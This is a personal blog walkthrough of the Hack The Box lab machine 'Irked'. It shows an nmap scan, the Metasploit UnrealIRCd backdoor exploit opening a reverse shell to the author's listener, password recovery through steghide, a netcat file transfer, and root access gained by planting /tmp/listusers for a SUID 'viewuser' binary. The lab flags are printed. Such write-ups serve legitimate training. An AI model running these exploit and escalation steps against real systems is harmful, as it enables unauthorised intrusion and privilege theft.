Irked – Pentesting Fun Stuff

As always I start with a port scan to get a list of open ports and running services:

# Nmap 7.70 scan initiated Sun Nov 18 20:40:15 2018 as: nmap -v -n -T4 -sS -sV -sC -oN nmap.scan -p- 10.10.10.117

Nmap scan report for 10.10.10.117

Host is up (0.029s latency).

Not shown: 65528 closed ports

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)

| ssh-hostkey:

| 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)

| 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)

| 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)

|_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)

80/tcp open http Apache httpd 2.4.10 ((Debian))

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

|_http-server-header: Apache/2.4.10 (Debian)

|_http-title: Site doesn't have a title (text/html).

111/tcp open rpcbind 2-4 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2,3,4 111/tcp rpcbind

| 100000 2,3,4 111/udp rpcbind

| 100024 1 40080/udp status

|_ 100024 1 47737/tcp status

6697/tcp open irc UnrealIRCd

8067/tcp open irc UnrealIRCd

47737/tcp open status 1 (RPC #100024)

65534/tcp open irc UnrealIRCd

Service Info: Host: irked.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap done at Sun Nov 18 20:41:48 2018 -- 1 IP address (1 host up) scanned in 92.87 seconds

Some information about the running webserver:

HTTP/1.1 200 OK

Date: Sun, 18 Nov 2018 20:00:42 GMT

Server: Apache/2.4.10 (Debian)

Last-Modified: Mon, 14 May 2018 18:00:02 GMT

ETag: "48-56c2e413aa86b"

Accept-Ranges: bytes

Content-Length: 72

Vary: Accept-Encoding

Content-Type: text/html

The browser can’t load the website, but cURL gives some information:

root@n0w4n:~/htb/irked# curl -vv 10.10.10.117

* Rebuilt URL to: 10.10.10.117/

* Trying 10.10.10.117...

* TCP_NODELAY set

* Connected to 10.10.10.117 (10.10.10.117) port 80 (#0)

> GET / HTTP/1.1

> Host: 10.10.10.117

> User-Agent: curl/7.61.0

> Accept: */*

< HTTP/1.1 200 OK

< Date: Sun, 18 Nov 2018 20:02:29 GMT

< Server: Apache/2.4.10 (Debian)

< Last-Modified: Mon, 14 May 2018 18:00:02 GMT

< ETag: "48-56c2e413aa86b"

< Accept-Ranges: bytes

< Content-Length: 72

< Vary: Accept-Encoding

< Content-Type: text/html

<br>

<b><center>IRC is almost working!</b></center>

* Connection #0 to host 10.10.10.117 left intact

There is a old backdoor exploit for UnrealIRC which can be exploited by metasploit.

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 6667 yes The target port (TCP)

Exploit target:

Id Name

-- ----

0 Automatic Target

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhost 10.10.10.117

rhost => 10.10.10.117

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697

rport => 6697

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 10.10.14.8

lhost => 10.10.14.8

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit

[*] Started reverse TCP double handler on 10.10.14.8:4444

[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...

:irked.htb NOTICE AUTH :*** Looking up your hostname...

[*] 10.10.10.117:6697 - Sending backdoor command...

[*] Accepted the first client connection...

[*] Accepted the second client connection...

[*] Command: echo jREAOnEfvR5esDJE;

[*] Writing to socket A

[*] Writing to socket B

[*] Reading from sockets...

[*] Reading from socket A

[*] A: "jREAOnEfvR5esDJE\r\n"

[*] Matching...

[*] B is input...

[*] Command shell session 1 opened (10.10.14.8:4444 -> 10.10.10.117:37970) at 2018-11-18 21:27:38 +0100

uid=1001(ircd) gid=1001(ircd) groups=1001(ircd)

python -c 'import pty;pty.spawn("/bin/bash");'

ircd@irked:~/Unreal3.2$

And it works…..now to take a look around.

ircd@irked:/tmp/n0w4n$ uname -a

uname -a

Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux

ircd@irked:/tmp/n0w4n$ cat /etc/*-release

cat /etc/*-release

PRETTY_NAME="Debian GNU/Linux 8 (jessie)"

NAME="Debian GNU/Linux"

VERSION_ID="8"

VERSION="8 (jessie)"

ID=debian

HOME_URL="http://www.debian.org/"

SUPPORT_URL="http://www.debian.org/support"

BUG_REPORT_URL="https://bugs.debian.org/"

ircd@irked:~$ less .bash_hi

less .bash_history

WARNING: terminal is not fully functional

.bash_history (press RETURN)

cat aliases

lskeys

ls keys

ls keys/CVS

cd keys

file CVS

cd CVS

ls Root

cat Root/Root

cd Root

file Root

cat Root

cd /

cd /home

cd djmardov

ls *

Input is not a pipe (press RETURN)

cd /tmp

clear

cd /

cd /var/www/html

cd /tmp

sudo -i

cd /home/ircd

clear

ls -lah

cd ..

cd djmardov

cd Documents

ls -lah

cat .backup

clear

exit

So I did some enumeration and got not very much.
After a while I looked back at what I found and banged my head a few times against the wall for being so blind.
The hint was there for the taking……
The .backup file had some content:

1 2	Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss

The mentioning about steg did me believe it had to do with steganography….but what file. Nothing I found on the system looked like it would work.
But one file did…….I missed it and feel so dumb. The picture on the main page!!!!!

root@n0w4n:~/htb/irked# steghide --extract -sf irked.jpg -p UPupDOWNdownLRlrBAbaSSss

wrote extracted data to "pass.txt".

root@n0w4n:~/htb/irked# cat pass.txt

Kab6h+m+bbp2J:HG

ircd@irked:/tmp$ su djmardov

su djmardov

Password: Kab6h+m+bbp2J:HG

djmardov@irked:/tmp$ id

uid=1000(djmardov) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth)

djmardov@irked:~/Documents$ cat user.txt

cat user.txt

4a66a78b12dc0e661a59d3f5c0267a8e

Got user now for root.

1	djmardov@irked:/tmp$ nc -lp 9999 > linenum.sh

1	root@n0w4n:~/htb/irked# nc -w3 10.10.10.117 9999 < linenum.sh

This is a nice enumeration tool to use for a quick scan of the system.
After a long look at the report I noticed a file that normally isn’t there.

[-] SUID files:

-rwsr-xr-- 1 root messagebus 362672 Nov 21 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper

-rwsr-xr-x 1 root root 9468 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device

-rwsr-xr-x 1 root root 13816 Sep 8 2016 /usr/lib/policykit-1/polkit-agent-helper-1

-rwsr-xr-x 1 root root 562536 Nov 19 2017 /usr/lib/openssh/ssh-keysign

-rwsr-xr-x 1 root root 13564 Oct 14 2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper

-rwsr-xr-x 1 root root 1085300 Feb 10 2018 /usr/sbin/exim4

-rwsr-xr-- 1 root dip 338948 Apr 14 2015 /usr/sbin/pppd

-rwsr-xr-x 1 root root 43576 May 17 2017 /usr/bin/chsh

-rwsr-sr-x 1 root mail 96192 Nov 18 2017 /usr/bin/procmail

-rwsr-xr-x 1 root root 78072 May 17 2017 /usr/bin/gpasswd

-rwsr-xr-x 1 root root 38740 May 17 2017 /usr/bin/newgrp

-rwsr-sr-x 1 daemon daemon 50644 Sep 30 2014 /usr/bin/at

-rwsr-xr-x 1 root root 18072 Sep 8 2016 /usr/bin/pkexec

-rwsr-sr-x 1 root root 9468 Apr 1 2014 /usr/bin/X

-rwsr-xr-x 1 root root 53112 May 17 2017 /usr/bin/passwd

-rwsr-xr-x 1 root root 52344 May 17 2017 /usr/bin/chfn

-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser

-rwsr-xr-x 1 root root 96760 Aug 13 2014 /sbin/mount.nfs

-rwsr-xr-x 1 root root 38868 May 17 2017 /bin/su

-rwsr-xr-x 1 root root 34684 Mar 29 2015 /bin/mount

-rwsr-xr-x 1 root root 34208 Jan 21 2016 /bin/fusermount

-rwsr-xr-x 1 root root 161584 Jan 28 2017 /bin/ntfs-3g

-rwsr-xr-x 1 root root 26344 Mar 29 2015 /bin/umount

Running /usr/bin/viewuser show the following message:

djmardov@irked:~$ /usr/bin/viewuser

This application is being devleoped to set and test user permissions

It is still being actively developed

(unknown) :0 2018-11-26 00:19 (:0)

djmardov pts/0 2018-11-26 13:55 (10.10.14.8)

djmardov pts/1 2018-11-26 13:47 (10.10.14.8)

sh: 1: /tmp/listusers: not found

It is looking for /tmp/listusers but can’t find it. Let’s help it.

djmardov@irked:~$ ls -lah / | grep root

drwxr-xr-x 21 root root 4.0K May 15 2018 .

drwxr-xr-x 21 root root 4.0K May 15 2018 ..

drwxr-xr-x 2 root root 4.0K May 11 2018 bin

drwxr-xr-x 3 root root 4.0K May 15 2018 boot

drwxr-xr-x 16 root root 3.1K Nov 26 00:19 dev

drwxr-xr-x 135 root root 12K Oct 30 14:51 etc

drwxr-xr-x 4 root root 4.0K May 14 2018 home

lrwxrwxrwx 1 root root 33 May 15 2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae

lrwxrwxrwx 1 root root 33 May 11 2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae

drwxr-xr-x 18 root root 4.0K May 11 2018 lib

drwx------ 2 root root 16K May 11 2018 lost+found

drwxr-xr-x 3 root root 4.0K May 11 2018 media

drwxr-xr-x 2 root root 4.0K May 11 2018 mnt

drwxr-xr-x 2 root root 4.0K May 11 2018 opt

dr-xr-xr-x 121 root root 0 Nov 26 00:18 proc

drwx------ 2 root root 4.0K Nov 3 04:25 root

drwxr-xr-x 22 root root 820 Nov 26 00:24 run

drwxr-xr-x 2 root root 4.0K Oct 30 14:51 sbin

drwxr-xr-x 2 root root 4.0K May 11 2018 srv

dr-xr-xr-x 13 root root 0 Nov 26 00:18 sys

drwxrwxrwt 11 root root 4.0K Nov 26 14:24 tmp

drwxr-xr-x 10 root root 4.0K May 11 2018 usr

drwxr-xr-x 13 root root 4.0K May 11 2018 var

lrwxrwxrwx 1 root root 29 May 15 2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae

lrwxrwxrwx 1 root root 29 May 11 2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae

As can be seen the /root folder is set to permission 700.

djmardov@irked:/root$ echo "chmod -R 777 /root" > /tmp/listusers && chmod 777 /tmp/listusers

djmardov@irked:/root$ /usr/bin/viewuser

This application is being devleoped to set and test user permissions

It is still being actively developed

(unknown) :0 2018-11-26 00:19 (:0)

djmardov pts/0 2018-11-26 13:55 (10.10.14.8)

djmardov pts/1 2018-11-26 13:47 (10.10.14.8)

djmardov@irked:~$ ls -lah / | grep root

drwxr-xr-x 21 root root 4.0K May 15 2018 .

drwxr-xr-x 21 root root 4.0K May 15 2018 ..

drwxr-xr-x 2 root root 4.0K May 11 2018 bin

drwxr-xr-x 3 root root 4.0K May 15 2018 boot

drwxr-xr-x 16 root root 3.1K Nov 26 00:19 dev

drwxr-xr-x 135 root root 12K Oct 30 14:51 etc

drwxr-xr-x 4 root root 4.0K May 14 2018 home

lrwxrwxrwx 1 root root 33 May 15 2018 initrd.img -> /boot/initrd.img-3.16.0-6-686-pae

lrwxrwxrwx 1 root root 33 May 11 2018 initrd.img.old -> /boot/initrd.img-3.16.0-4-686-pae

drwxr-xr-x 18 root root 4.0K May 11 2018 lib

drwx------ 2 root root 16K May 11 2018 lost+found

drwxr-xr-x 3 root root 4.0K May 11 2018 media

drwxr-xr-x 2 root root 4.0K May 11 2018 mnt

drwxr-xr-x 2 root root 4.0K May 11 2018 opt

dr-xr-xr-x 121 root root 0 Nov 26 00:18 proc

drwxrwxrwx 2 root root 4.0K Nov 3 04:25 root

drwxr-xr-x 22 root root 820 Nov 26 00:24 run

drwxr-xr-x 2 root root 4.0K Oct 30 14:51 sbin

drwxr-xr-x 2 root root 4.0K May 11 2018 srv

dr-xr-xr-x 13 root root 0 Nov 26 14:25 sys

drwxrwxrwt 11 root root 4.0K Nov 26 14:24 tmp

drwxr-xr-x 10 root root 4.0K May 11 2018 usr

drwxr-xr-x 13 root root 4.0K May 11 2018 var

lrwxrwxrwx 1 root root 29 May 15 2018 vmlinuz -> boot/vmlinuz-3.16.0-6-686-pae

lrwxrwxrwx 1 root root 29 May 11 2018 vmlinuz.old -> boot/vmlinuz-3.16.0-4-686-pae

Looks like the permission on the /root folder has changed to the better.

djmardov@irked:/root$ ls -lah

total 28K

drwxrwxrwx 2 root root 4.0K Nov 3 04:25 .

drwxr-xr-x 21 root root 4.0K May 15 2018 ..

lrwxrwxrwx 1 root root 9 Nov 3 04:25 .bash_history -> /dev/null

-rwxrwxrwx 1 root root 570 Jan 31 2010 .bashrc

-rwxrwxrwx 1 root root 12 Nov 3 04:43 .nano_history

-rwxrwxrwx 1 root root 17 May 14 2018 pass.txt

-rwxrwxrwx 1 root root 140 Nov 19 2007 .profile

-rwxrwxrwx 1 root root 33 May 15 2018 root.txt

djmardov@irked:/root$ cat root.txt

8d8e9e8be64654b6dccc3bff4522daf3

And there we have it. Can’t say I really like this machine and the challenge it presented.
It is more a CTF kinda machine then the regular HTB machines and for something like OSCP training I wouldn’t recommend it.
But it does show that enumeration is key.

Leave a Reply Cancel reply